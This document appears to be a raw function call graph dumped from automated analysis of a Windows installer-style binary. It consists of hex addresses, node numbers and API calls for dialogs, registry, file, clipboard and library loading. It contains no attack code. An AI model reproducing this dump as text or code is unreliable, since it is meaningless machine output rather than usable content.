4494 40417a 4490->4494 4495 404365 4491->4495 4497 404353 4492->4497 4498 404343 SendMessageW 4492->4498 4500 403d6b 19 API calls 4494->4500 4496->4487 4497->4495 4501 404359 SendMessageW 4497->4501 4498->4497 4499 404293 4502 403d8d SendMessageW 4499->4502 4503 404187 CheckDlgButton 4500->4503 4501->4495 4502->4481 4513 403db1 KiUserCallbackDispatcher 4503->4513 4505 4041a5 GetDlgItem 4514 403dc4 SendMessageW 4505->4514 4507 4041bb SendMessageW 4508 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4507->4508 4509 4041d8 GetSysColor 4507->4509 4508->4495 4509->4508 4511 404033 4510->4511 4512 404015 GlobalAlloc WideCharToMultiByte 4510->4512 4511->4482 4512->4511 4513->4505 4514->4507 4515->4499 4516 402ae4 4517 402aeb 4516->4517 4518 4030e3 4516->4518 4519 402af2 CloseHandle 4517->4519 4519->4518 4520 402065 4521 401446 18 API calls 4520->4521 4522 40206d 4521->4522 4523 401446 18 API calls 4522->4523 4524 402076 GetDlgItem 4523->4524 4525 4030dc 4524->4525 4526 4030e3 4525->4526 4528 405f7d wsprintfW 4525->4528 4528->4526 4529 402665 4530 40145c 18 API calls 4529->4530 4531 40266b 4530->4531 4532 40145c 18 API calls 4531->4532 4533 402674 4532->4533 4534 40145c 18 API calls 4533->4534 4535 40267d 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 40268c 4536->4537 4538 406301 2 API calls 4537->4538 4539 402695 4538->4539 4540 4026a6 lstrlenW lstrlenW 4539->4540 4542 404f9e 25 API calls 4539->4542 4544 4030e3 4539->4544 4541 404f9e 25 API calls 4540->4541 4543 4026e8 SHFileOperationW 4541->4543 4542->4539 4543->4539 4543->4544 4545 401c69 4546 40145c 18 API calls 4545->4546 4547 401c70 4546->4547 4548 4062cf 11 API calls 4547->4548 4549 401c80 4548->4549 4550 405ccc MessageBoxIndirectW 4549->4550 4551 401a13 4550->4551 4552 402f6e 4553 402f72 4552->4553 4554 402fae 4552->4554 4556 4062cf 11 API calls 4553->4556 4555 40145c 18 API calls 4554->4555 4562 402f9d 4555->4562 4557 402f7d 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 402f90 4558->4559 4560 402fa2 4559->4560 4561 402f98 4559->4561 4564 406113 9 API calls 4560->4564 4563 403ea0 5 API calls 4561->4563 4563->4562 4564->4562 4565 4023f0 4566 402403 4565->4566 4567 4024da 4565->4567 4568 40145c 18 API calls 4566->4568 4569 404f9e 25 API calls 4567->4569 4570 40240a 4568->4570 4573 4024f1 4569->4573 4571 40145c 18 API calls 4570->4571 4572 402413 4571->4572 4574 402429 LoadLibraryExW 4572->4574 4575 40241b GetModuleHandleW 4572->4575 4576 4024ce 4574->4576 4577 40243e 4574->4577 4575->4574 4575->4577 4579 404f9e 25 API calls 4576->4579 4589 406391 GlobalAlloc WideCharToMultiByte 4577->4589 4579->4567 4580 402449 4581 40248c 4580->4581 4582 40244f 4580->4582 4583 404f9e 25 API calls 4581->4583 4584 401435 25 API calls 4582->4584 4587 40245f 4582->4587 4585 402496 4583->4585 4584->4587 4586 4062cf 11 API calls 4585->4586 4586->4587 4587->4573 4588 4024c0 FreeLibrary 4587->4588 4588->4573 4590 4063c9 GlobalFree 4589->4590 4591 4063bc GetProcAddress 4589->4591 4590->4580 4591->4590 3431 402175 3432 401446 18 API calls 3431->3432 3433 40217c 3432->3433 3434 401446 18 API calls 3433->3434 3435 402186 3434->3435 3436 402197 3435->3436 3439 4062cf 11 API calls 3435->3439 3437 4021aa EnableWindow 3436->3437 3438 40219f ShowWindow 3436->3438 3440 4030e3 3437->3440 3438->3440 3439->3436 4592 4048f8 4593 404906 4592->4593 4594 40491d 4592->4594 4595 40490c 4593->4595 4610 404986 4593->4610 4596 40492b IsWindowVisible 4594->4596 4602 404942 4594->4602 4597 403ddb SendMessageW 4595->4597 4599 404938 4596->4599 4596->4610 4600 404916 4597->4600 4598 40498c CallWindowProcW 4598->4600 4611 40487a SendMessageW 4599->4611 4602->4598 4616 406035 lstrcpynW 4602->4616 4604 404971 4617 405f7d wsprintfW 4604->4617 4606 404978 4607 40141d 80 API calls 4606->4607 4608 40497f 4607->4608 4618 406035 lstrcpynW 4608->4618 4610->4598 4612 4048d7 SendMessageW 4611->4612 4613 40489d GetMessagePos ScreenToClient SendMessageW 4611->4613 4615 4048cf 4612->4615 4614 4048d4 4613->4614 4613->4615 4614->4612 4615->4602 4616->4604 4617->4606 4618->4610 3733 4050f9 3734 4052c1 3733->3734 3735 40511a GetDlgItem GetDlgItem GetDlgItem 3733->3735 3736 4052f2 3734->3736 3737 4052ca GetDlgItem CreateThread CloseHandle 3734->3737 3782 403dc4 SendMessageW 3735->3782 3739 405320 3736->3739 3741 405342 3736->3741 3742 40530c ShowWindow ShowWindow 3736->3742 3737->3736 3785 405073 OleInitialize 3737->3785 3743 40537e 3739->3743 3745 405331 3739->3745 3746 405357 ShowWindow 3739->3746 3740 40518e 3752 406831 18 API calls 3740->3752 3747 403df6 8 API calls 3741->3747 3784 403dc4 SendMessageW 3742->3784 3743->3741 3748 405389 SendMessageW 3743->3748 3749 403d44 SendMessageW 3745->3749 3750 405377 3746->3750 3751 405369 3746->3751 3757 4052ba 3747->3757 3756 4053a2 CreatePopupMenu 3748->3756 3748->3757 3749->3741 3755 403d44 SendMessageW 3750->3755 3753 404f9e 25 API calls 3751->3753 3754 4051ad 3752->3754 3753->3750 3758 4062cf 11 API calls 3754->3758 3755->3743 3759 406831 18 API calls 3756->3759 3760 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3758->3760 3761 4053b2 AppendMenuW 3759->3761 3762 405203 SendMessageW SendMessageW 3760->3762 3763 40521f 3760->3763 3764 4053c5 GetWindowRect 3761->3764 3765 4053d8 3761->3765 3762->3763 3766 405232 3763->3766 3767 405224 SendMessageW 3763->3767 3768 4053df TrackPopupMenu 3764->3768 3765->3768 3769 403d6b 19 API calls 3766->3769 3767->3766 3768->3757 3770 4053fd 3768->3770 3771 405242 3769->3771 3772 405419 SendMessageW 3770->3772 3773 40524b ShowWindow 3771->3773 3774 40527f GetDlgItem SendMessageW 3771->3774 3772->3772 3775 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3772->3775 3776 405261 ShowWindow 3773->3776 3777 40526e 3773->3777 3774->3757 3778 4052a2 SendMessageW SendMessageW 3774->3778 3779 40545b SendMessageW 3775->3779 3776->3777 3783 403dc4 SendMessageW 3777->3783 3778->3757 3779->3779 3780 405486 GlobalUnlock SetClipboardData CloseClipboard 3779->3780 3780->3757 3782->3740 3783->3774 3784->3739 3786 403ddb SendMessageW 3785->3786 3790 405096 3786->3790 3787 403ddb SendMessageW 3788 4050d1 OleUninitialize 3787->3788 3789 4062cf 11 API calls 3789->3790 3790->3789 3791 40139d 80 API calls 3790->3791 3792 4050c1 3790->3792 3791->3790 3792->3787 4619 4020f9 GetDC GetDeviceCaps 4620 401446 18 API calls 4619->4620 4621 402116 MulDiv 4620->4621 4622 401446 18 API calls 4621->4622 4623 40212c 4622->4623 4624 406831 18 API calls 4623->4624 4625 402165 CreateFontIndirectW 4624->4625 4626 4030dc 4625->4626 4627 4030e3 4626->4627 4629 405f7d wsprintfW 4626->4629 4629->4627 4630 4024fb 4631 40145c 18 API calls 4630->4631 4632 402502 4631->4632 4633 40145c 18 API calls 4632->4633 4634 40250c 4633->4634 4635 40145c 18 API calls 4634->4635 4636 402515 4635->4636 4637 40145c 18 API calls 4636->4637 4638 40251f 4637->4638 4639 40145c 18 API calls 4638->4639 4640 402529 4639->4640 4641 40253d 4640->4641 4642 40145c 18 API calls 4640->4642 4643 4062cf 11 API calls 4641->4643 4642->4641 4644 40256a CoCreateInstance 4643->4644 4645 40258c 4644->4645 4646 4026fc 4648 402708 4646->4648 4649 401ee4 4646->4649 4647 406831 18 API calls 4647->4649 4649->4646 4649->4647 3793 4019fd 3794 40145c 18 API calls 3793->3794 3795 401a04 3794->3795 3798 405eab 3795->3798 3799 405eb8 GetTickCount GetTempFileNameW 3798->3799 3800 401a0b 3799->3800 3801 405eee 3799->3801 3801->3799 3801->3800 4650 4022fd 4651 40145c 18 API calls 4650->4651 4652 402304 GetFileVersionInfoSizeW 4651->4652 4653 4030e3 4652->4653 4654 40232b GlobalAlloc 4652->4654 4654->4653 4655 40233f GetFileVersionInfoW 4654->4655 4656 402350 VerQueryValueW 4655->4656 4657 402381 GlobalFree 4655->4657 4656->4657 4658 402369 4656->4658 4657->4653 4663 405f7d wsprintfW 4658->4663 4661 402375 4664 405f7d wsprintfW 4661->4664 4663->4661 4664->4657 4665 402afd 4666 40145c 18 API calls 4665->4666 4667 402b04 4666->4667 4672 405e7c GetFileAttributesW CreateFileW 4667->4672 4669 402b10 4670 4030e3 4669->4670 4673 405f7d wsprintfW 4669->4673 4672->4669 4673->4670 4674 4029ff 4675 401553 19 API calls 4674->4675 4676 402a09 4675->4676 4677 40145c 18 API calls 4676->4677 4678 402a12 4677->4678 4679 402a1f RegQueryValueExW 4678->4679 4683 401a13 4678->4683 4680 402a45 4679->4680 4681 402a3f 4679->4681 4682 4029e4 RegCloseKey 4680->4682 4680->4683 4681->4680 4685 405f7d wsprintfW 4681->4685 4682->4683 4685->4680 4686 401000 4687 401037 BeginPaint GetClientRect 4686->4687 4688 40100c DefWindowProcW 4686->4688 4690 4010fc 4687->4690 4691 401182 4688->4691 4692 401073 CreateBrushIndirect FillRect DeleteObject 4690->4692 4693 401105 4690->4693 4692->4690 4694 401170 EndPaint 4693->4694 4695 40110b CreateFontIndirectW 4693->4695 4694->4691 4695->4694 4696 40111b 6 API calls 4695->4696 4696->4694 4697 401f80 4698 401446 18 API calls 4697->4698 4699 401f88 4698->4699 4700 401446 18 API calls 4699->4700 4701 401f93 4700->4701 4702 401fa3 4701->4702 4703 40145c 18 API calls 4701->4703 4704 401fb3 4702->4704 4705 40145c 18 API calls 4702->4705 4703->4702 4706 402006 4704->4706 4707 401fbc 4704->4707 4705->4704 4708 40145c 18 API calls 4706->4708 4709 401446 18 API calls 4707->4709 4710 40200d 4708->4710 4711 401fc4 4709->4711 4713 40145c 18 API calls 4710->4713 4712 401446 18 API calls 4711->4712 4714 401fce 4712->4714 4715 402016 FindWindowExW 4713->4715 4716 401ff6 SendMessageW 4714->4716 4717 401fd8 SendMessageTimeoutW 4714->4717 4719 402036 4715->4719 4716->4719 4717->4719 4718 4030e3 4719->4718 4721 405f7d wsprintfW 4719->4721 4721->4718 4722 402880 4723 402884 4722->4723 4724 40145c 18 API calls 4723->4724 4725 4028a7 4724->4725 4726 40145c 18 API calls 4725->4726 4727 4028b1 4726->4727 4728 4028ba RegCreateKeyExW 4727->4728 4729 4028e8 4728->4729 4734 4029ef 4728->4734 4730 402934 4729->4730 4732 40145c 18 API calls 4729->4732 4731 402963 4730->4731 4733 401446 18 API calls 4730->4733 4735 4029ae RegSetValueExW 4731->4735 4738 40337f 33 API calls 4731->4738 4736 4028fc lstrlenW 4732->4736 4737 402947 4733->4737 4741 4029c6 RegCloseKey 4735->4741 4742 4029cb 4735->4742 4739 402918 4736->4739 4740 40292a 4736->4740 4744 4062cf 11 API calls 4737->4744 4745 40297b 4738->4745 4746 4062cf 11 API calls 4739->4746 4747 4062cf 11 API calls 4740->4747 4741->4734 4743 4062cf 11 API calls 4742->4743 4743->4741 4744->4731 4753 406250 4745->4753 4750 402922 4746->4750 4747->4730 4750->4735 4752 4062cf 11 API calls 4752->4750 4754 406273 4753->4754 4755 4062b6 4754->4755 4756 406288 wsprintfW 4754->4756 4757 402991 4755->4757 4758 4062bf lstrcatW 4755->4758 4756->4755 4756->4756 4757->4752 4758->4757 4759 403d02 4760 403d0d 4759->4760 4761 403d11 4760->4761 4762 403d14 GlobalAlloc 4760->4762 4762->4761 4763 402082 4764 401446 18 API calls 4763->4764 4765 402093 SetWindowLongW 4764->4765 4766 4030e3 4765->4766 4767 402a84 4768 401553 19 API calls 4767->4768 4769 402a8e 4768->4769 4770 401446 18 API calls 4769->4770 4771 402a98 4770->4771 4772 401a13 4771->4772 4773 402ab2 RegEnumKeyW 4771->4773 4774 402abe RegEnumValueW 4771->4774 4775 402a7e 4773->4775 4774->4772 4774->4775 4775->4772 4776 4029e4 RegCloseKey 4775->4776 4776->4772 4777 402c8a 4778 402ca2 4777->4778 4779 402c8f 4777->4779 4781 40145c 18 API calls 4778->4781 4780 401446 18 API calls 4779->4780 4783 402c97 4780->4783 4782 402ca9 lstrlenW 4781->4782 4782->4783 4784 401a13 4783->4784 4785 402ccb WriteFile 4783->4785 4785->4784 4786 401d8e 4787 40145c 18 API calls 4786->4787 4788 401d95 ExpandEnvironmentStringsW 4787->4788 4789 401da8 4788->4789 4790 401db9 4788->4790 4789->4790 4791 401dad lstrcmpW 4789->4791 4791->4790 4792 401e0f 4793 401446 18 API calls 4792->4793 4794 401e17 4793->4794 4795 401446 18 API calls 4794->4795 4796 401e21 4795->4796 4797 4030e3 4796->4797 4799 405f7d wsprintfW 4796->4799 4799->4797 4800 40438f 4801 4043c8 4800->4801 4802 40439f 4800->4802 4803 403df6 8 API calls 4801->4803 4804 403d6b 19 API calls 4802->4804 4806 4043d4 4803->4806 4805 4043ac SetDlgItemTextW 4804->4805 4805->4801 4807 403f90 4808 403fa0 4807->4808 4809 403fbc 4807->4809 4818 405cb0 GetDlgItemTextW 4808->4818 4811 403fc2 SHGetPathFromIDListW 4809->4811 4812 403fef 4809->4812 4814 403fd2 4811->4814 4817 403fd9 SendMessageW 4811->4817 4813 403fad SendMessageW 4813->4809 4815 40141d 80 API calls 4814->4815 4815->4817 4817->4812 4818->4813 4819 402392 4820 40145c 18 API calls 4819->4820 4821 402399 4820->4821 4824 407224 4821->4824 4825 406efe 25 API calls 4824->4825 4826 407244 4825->4826 4827 4023a7 4826->4827 4828 40724e lstrcpynW lstrcmpW 4826->4828 4829 407280 4828->4829 4830 407286 lstrcpynW 4828->4830 4829->4830 4830->4827 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4831 402797 4832 40145c 18 API calls 4831->4832 4833 4027ae 4832->4833 4834 40145c 18 API calls 4833->4834 4835 4027b7 4834->4835 4836 40145c 18 API calls 4835->4836 4837 4027c0 GetPrivateProfileStringW lstrcmpW 4836->4837 4838 401e9a 4839 40145c 18 API calls 4838->4839 4840 401ea1 4839->4840 4841 401446 18 API calls 4840->4841 4842 401eab wsprintfW 4841->4842 3802 401a1f 3803 40145c 18 API calls 3802->3803 3804 401a26 3803->3804 3805 4062cf 11 API calls 3804->3805 3806 401a49 3805->3806 3807 401a64 3806->3807 3808 401a5c 3806->3808 3877 406035 lstrcpynW 3807->3877 3876 406035 lstrcpynW 3808->3876 3811 401a6f 3878 40674e lstrlenW CharPrevW 3811->3878 3812 401a62 3815 406064 5 API calls 3812->3815 3846 401a81 3815->3846 3816 406301 2 API calls 3816->3846 3819 401a98 CompareFileTime 3819->3846 3820 401ba9 3821 404f9e 25 API calls 3820->3821 3823 401bb3 3821->3823 3822 401b5d 3824 404f9e 25 API calls 3822->3824 3855 40337f 3823->3855 3826 401b70 3824->3826 3830 4062cf 11 API calls 3826->3830 3828 406035 lstrcpynW 3828->3846 3829 4062cf 11 API calls 3831 401bda 3829->3831 3835 401b8b 3830->3835 3832 401be9 SetFileTime 3831->3832 3833 401bf8 CloseHandle 3831->3833 3832->3833 3833->3835 3836 401c09 3833->3836 3834 406831 18 API calls 3834->3846 3837 401c21 3836->3837 3838 401c0e 3836->3838 3839 406831 18 API calls 3837->3839 3840 406831 18 API calls 3838->3840 3841 401c29 3839->3841 3843 401c16 lstrcatW 3840->3843 3844 4062cf 11 API calls 3841->3844 3843->3841 3847 401c34 3844->3847 3845 401b50 3849 401b93 3845->3849 3850 401b53 3845->3850 3846->3816 3846->3819 3846->3820 3846->3822 3846->3828 3846->3834 3846->3845 3848 4062cf 11 API calls 3846->3848 3854 405e7c GetFileAttributesW CreateFileW 3846->3854 3881 405e5c GetFileAttributesW 3846->3881 3884 405ccc 3846->3884 3851 405ccc MessageBoxIndirectW 3847->3851 3848->3846 3852 4062cf 11 API calls 3849->3852 3853 4062cf 11 API calls 3850->3853 3851->3835 3852->3835 3853->3822 3854->3846 3856 40339a 3855->3856 3857 4033c7 3856->3857 3890 403368 SetFilePointer 3856->3890 3888 403336 ReadFile 3857->3888 3861 401bc6 3861->3829 3862 403546 3864 40354a 3862->3864 3865 40356e 3862->3865 3863 4033eb GetTickCount 3863->3861 3868 403438 3863->3868 3866 403336 ReadFile 3864->3866 3865->3861 3869 403336 ReadFile 3865->3869 3870 40358d WriteFile 3865->3870 3866->3861 3867 403336 ReadFile 3867->3868 3868->3861 3868->3867 3872 40348a GetTickCount 3868->3872 3873 4034af MulDiv wsprintfW 3868->3873 3875 4034f3 WriteFile 3868->3875 3869->3865 3870->3861 3871 4035a1 3870->3871 3871->3861 3871->3865 3872->3868 3874 404f9e 25 API calls 3873->3874 3874->3868 3875->3861 3875->3868 3876->3812 3877->3811 3879 401a75 lstrcatW 3878->3879 3880 40676b lstrcatW 3878->3880 3879->3812 3880->3879 3882 405e79 3881->3882 3883 405e6b SetFileAttributesW 3881->3883 3882->3846 3883->3882 3885 405ce1 3884->3885 3886 405d2f 3885->3886 3887 405cf7 MessageBoxIndirectW 3885->3887 3886->3846 3887->3886 3889 403357 3888->3889 3889->3861 3889->3862 3889->3863 3890->3857 4843 40209f GetDlgItem GetClientRect 4844 40145c 18 API calls 4843->4844 4845 4020cf LoadImageW SendMessageW 4844->4845 4846 4030e3 4845->4846 4847 4020ed DeleteObject 4845->4847 4847->4846 4848 402b9f 4849 401446 18 API calls 4848->4849 4853 402ba7 4849->4853 4850 402c4a 4851 402bdf ReadFile 4851->4853 4860 402c3d 4851->4860 4852 401446 18 API calls 4852->4860 4853->4850 4853->4851 4854 402c06 MultiByteToWideChar 4853->4854 4855 402c3f 4853->4855 4856 402c4f 4853->4856 4853->4860 4854->4853 4854->4856 4861 405f7d wsprintfW 4855->4861 4858 402c6b SetFilePointer 4856->4858 4856->4860 4858->4860 4859 402d17 ReadFile 4859->4860 4860->4850 4860->4852 4860->4859 4861->4850 3417 402b23 GlobalAlloc 3418 402b39 3417->3418 3419 402b4b 3417->3419 3428 401446 3418->3428 3421 40145c 18 API calls 3419->3421 3422 402b52 WideCharToMultiByte lstrlenA 3421->3422 3423 402b41 3422->3423 3424 402b84 WriteFile 3423->3424 3425 402b93 3423->3425 3424->3425 3426 402384 GlobalFree 3424->3426 3426->3425 3429 406831 18 API calls 3428->3429 3430 401455 3429->3430 3430->3423 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3441 4054a5 3442 4055f9 3441->3442 3443 4054bd 3441->3443 3445 40564a 3442->3445 3446 40560a GetDlgItem GetDlgItem 3442->3446 3443->3442 3444 4054c9 3443->3444 3448 4054d4 SetWindowPos 3444->3448 3449 4054e7 3444->3449 3447 4056a4 3445->3447 3455 40139d 80 API calls 3445->3455 3450 403d6b 19 API calls 3446->3450 3456 4055f4 3447->3456 3511 403ddb 3447->3511 3448->3449 3452 405504 3449->3452 3453 4054ec ShowWindow 3449->3453 3454 405634 SetClassLongW 3450->3454 3457 405526 3452->3457 3458 40550c DestroyWindow 3452->3458 3453->3452 3459 40141d 80 API calls 3454->3459 3462 40567c 3455->3462 3460 40552b SetWindowLongW 3457->3460 3461 40553c 3457->3461 3463 405908 3458->3463 3459->3445 3460->3456 3464 4055e5 3461->3464 3465 405548 GetDlgItem 3461->3465 3462->3447 3466 405680 SendMessageW 3462->3466 3463->3456 3472 405939 ShowWindow 3463->3472 3531 403df6 3464->3531 3469 405578 3465->3469 3470 40555b SendMessageW IsWindowEnabled 3465->3470 3466->3456 3467 40141d 80 API calls 3480 4056b6 3467->3480 3468 40590a DestroyWindow KiUserCallbackDispatcher 3468->3463 3474 405585 3469->3474 3477 4055cc SendMessageW 3469->3477 3478 405598 3469->3478 3486 40557d 3469->3486 3470->3456 3470->3469 3472->3456 3473 406831 18 API calls 3473->3480 3474->3477 3474->3486 3476 403d6b 19 API calls 3476->3480 3477->3464 3481 4055a0 3478->3481 3482 4055b5 3478->3482 3479 4055b3 3479->3464 3480->3456 3480->3467 3480->3468 3480->3473 3480->3476 3502 40584a DestroyWindow 3480->3502 3514 403d6b 3480->3514 3525 40141d 3481->3525 3483 40141d 80 API calls 3482->3483 3485 4055bc 3483->3485 3485->3464 3485->3486 3528 403d44 3486->3528 3488 405731 GetDlgItem 3489 405746 3488->3489 3490 40574f ShowWindow KiUserCallbackDispatcher 3488->3490 3489->3490 3517 403db1 KiUserCallbackDispatcher 3490->3517 3492 405779 EnableWindow 3495 40578d 3492->3495 3493 405792 GetSystemMenu EnableMenuItem SendMessageW 3494 4057c2 SendMessageW 3493->3494 3493->3495 3494->3495 3495->3493 3518 403dc4 SendMessageW 3495->3518 3519 406035 lstrcpynW 3495->3519 3498 4057f0 lstrlenW 3499 406831 18 API calls 3498->3499 3500 405806 SetWindowTextW 3499->3500 3520 40139d 3500->3520 3502->3463 3503 405864 CreateDialogParamW 3502->3503 3503->3463 3504 405897 3503->3504 3505 403d6b 19 API calls 3504->3505 3506 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 40139d 80 API calls 3506->3507 3508 4058e8 3507->3508 3508->3456 3509 4058f0 ShowWindow 3508->3509 3510 403ddb SendMessageW 3509->3510 3510->3463 3512 403df3 3511->3512 3513 403de4 SendMessageW 3511->3513 3512->3480 3513->3512 3515 406831 18 API calls 3514->3515 3516 403d76 SetDlgItemTextW 3515->3516 3516->3488 3517->3492 3518->3495 3519->3498 3523 4013a4 3520->3523 3521 401410 3521->3480 3523->3521 3524 4013dd MulDiv SendMessageW 3523->3524 3545 4015a0 3523->3545 3524->3523 3526 40139d 80 API calls 3525->3526 3527 401432 3526->3527 3527->3486 3529 403d51 SendMessageW 3528->3529 3530 403d4b 3528->3530 3529->3479 3530->3529 3532 403e0b GetWindowLongW 3531->3532 3542 403e94 3531->3542 3533 403e1c 3532->3533 3532->3542 3534 403e2b GetSysColor 3533->3534 3535 403e2e 3533->3535 3534->3535 3536 403e34 SetTextColor 3535->3536 3537 403e3e SetBkMode 3535->3537 3536->3537 3538 403e56 GetSysColor 3537->3538 3539 403e5c 3537->3539 3538->3539 3540 403e63 SetBkColor 3539->3540 3541 403e6d 3539->3541 3540->3541 3541->3542 3543 403e80 DeleteObject 3541->3543 3544 403e87 CreateBrushIndirect 3541->3544 3542->3456 3543->3544 3544->3542 3546 4015fa 3545->3546 3625 40160c 3545->3625 3547 401601 3546->3547 3548 401742 3546->3548 3549 401962 3546->3549 3550 4019ca 3546->3550 3551 40176e 3546->3551 3552 401650 3546->3552 3553 4017b1 3546->3553 3554 401672 3546->3554 3555 401693 3546->3555 3556 401616 3546->3556 3557 4016d6 3546->3557 3558 401736 3546->3558 3559 401897 3546->3559 3560 4018db 3546->3560 3561 40163c 3546->3561 3562 4016bd 3546->3562 3546->3625 3571 4062cf 11 API calls 3547->3571 3563 401751 ShowWindow 3548->3563 3564 401758 3548->3564 3568 40145c 18 API calls 3549->3568 3575 40145c 18 API calls 3550->3575 3565 40145c 18 API calls 3551->3565 3589 4062cf 11 API calls 3552->3589 3569 40145c 18 API calls 3553->3569 3566 40145c 18 API calls 3554->3566 3570 401446 18 API calls 3555->3570 3574 40145c 18 API calls 3556->3574 3588 401446 18 API calls 3557->3588 3557->3625 3558->3625 3679 405f7d wsprintfW 3558->3679 3567 40145c 18 API calls 3559->3567 3572 40145c 18 API calls 3560->3572 3576 401647 PostQuitMessage 3561->3576 3561->3625 3573 4062cf 11 API calls 3562->3573 3563->3564 3577 401765 ShowWindow 3564->3577 3564->3625 3578 401775 3565->3578 3579 401678 3566->3579 3580 40189d 3567->3580 3581 401968 GetFullPathNameW 3568->3581 3582 4017b8 3569->3582 3583 40169a 3570->3583 3571->3625 3584 4018e2 3572->3584 3585 4016c7 SetForegroundWindow 3573->3585 3586 40161c 3574->3586 3587 4019d1 SearchPathW 3575->3587 3576->3625 3577->3625 3591 4062cf 11 API calls 3578->3591 3592 4062cf 11 API calls 3579->3592 3670 406301 FindFirstFileW 3580->3670 3594 4019a1 3581->3594 3595 40197f 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 4062cf 11 API calls 3583->3597 3598 40145c 18 API calls 3584->3598 3585->3625 3599 4062cf 11 API calls 3586->3599 3587->3558 3587->3625 3588->3625 3600 401664 3589->3600 3601 401785 SetFileAttributesW 3591->3601 3602 401683 3592->3602 3614 4019b8 GetShortPathNameW 3594->3614 3594->3625 3595->3594 3620 406301 2 API calls 3595->3620 3604 4017c9 3596->3604 3605 4016a7 Sleep 3597->3605 3606 4018eb 3598->3606 3607 401627 3599->3607 3608 40139d 65 API calls 3600->3608 3609 40179a 3601->3609 3601->3625 3618 404f9e 25 API calls 3602->3618 3652 405d85 CharNextW CharNextW 3604->3652 3605->3625 3615 40145c 18 API calls 3606->3615 3616 404f9e 25 API calls 3607->3616 3608->3625 3617 4062cf 11 API calls 3609->3617 3610 4018c2 3621 4062cf 11 API calls 3610->3621 3611 4018a9 3619 4062cf 11 API calls 3611->3619 3614->3625 3623 4018f5 3615->3623 3616->3625 3617->3625 3618->3625 3619->3625 3624 401991 3620->3624 3621->3625 3622 4017d4 3626 401864 3622->3626 3629 405d32 CharNextW 3622->3629 3647 4062cf 11 API calls 3622->3647 3627 4062cf 11 API calls 3623->3627 3624->3594 3678 406035 lstrcpynW 3624->3678 3625->3523 3626->3602 3628 40186e 3626->3628 3630 401902 MoveFileW 3627->3630 3658 404f9e 3628->3658 3633 4017e6 CreateDirectoryW 3629->3633 3634 401912 3630->3634 3635 40191e 3630->3635 3633->3622 3637 4017fe GetLastError 3633->3637 3634->3602 3641 406301 2 API calls 3635->3641 3651 401942 3635->3651 3639 401827 GetFileAttributesW 3637->3639 3640 40180b GetLastError 3637->3640 3639->3622 3644 4062cf 11 API calls 3640->3644 3645 401929 3641->3645 3642 401882 SetCurrentDirectoryW 3642->3625 3643 4062cf 11 API calls 3646 40195c 3643->3646 3644->3622 3645->3651 3673 406c94 3645->3673 3646->3625 3647->3622 3650 404f9e 25 API calls 3650->3651 3651->3643 3653 405da2 3652->3653 3656 405db4 3652->3656 3655 405daf CharNextW 3653->3655 3653->3656 3654 405dd8 3654->3622 3655->3654 3656->3654 3657 405d32 CharNextW 3656->3657 3657->3656 3659 404fb7 3658->3659 3660 401875 3658->3660 3661 404fd5 lstrlenW 3659->3661 3662 406831 18 API calls 3659->3662 3669 406035 lstrcpynW 3660->3669 3663 404fe3 lstrlenW 3661->3663 3664 404ffe 3661->3664 3662->3661 3663->3660 3665 404ff5 lstrcatW 3663->3665 3666 405011 3664->3666 3667 405004 SetWindowTextW 3664->3667 3665->3664 3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 